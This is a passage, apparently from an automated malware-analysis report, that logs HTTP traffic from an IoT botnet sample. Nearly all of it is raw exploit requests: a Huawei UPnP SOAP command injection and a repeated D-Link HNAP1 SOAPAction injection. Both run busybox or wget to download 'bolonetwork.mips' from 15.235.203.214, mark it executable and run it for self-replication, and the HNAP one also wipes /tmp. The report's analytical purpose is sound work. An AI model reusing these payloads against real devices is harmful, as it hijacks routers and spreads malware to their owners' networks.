6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
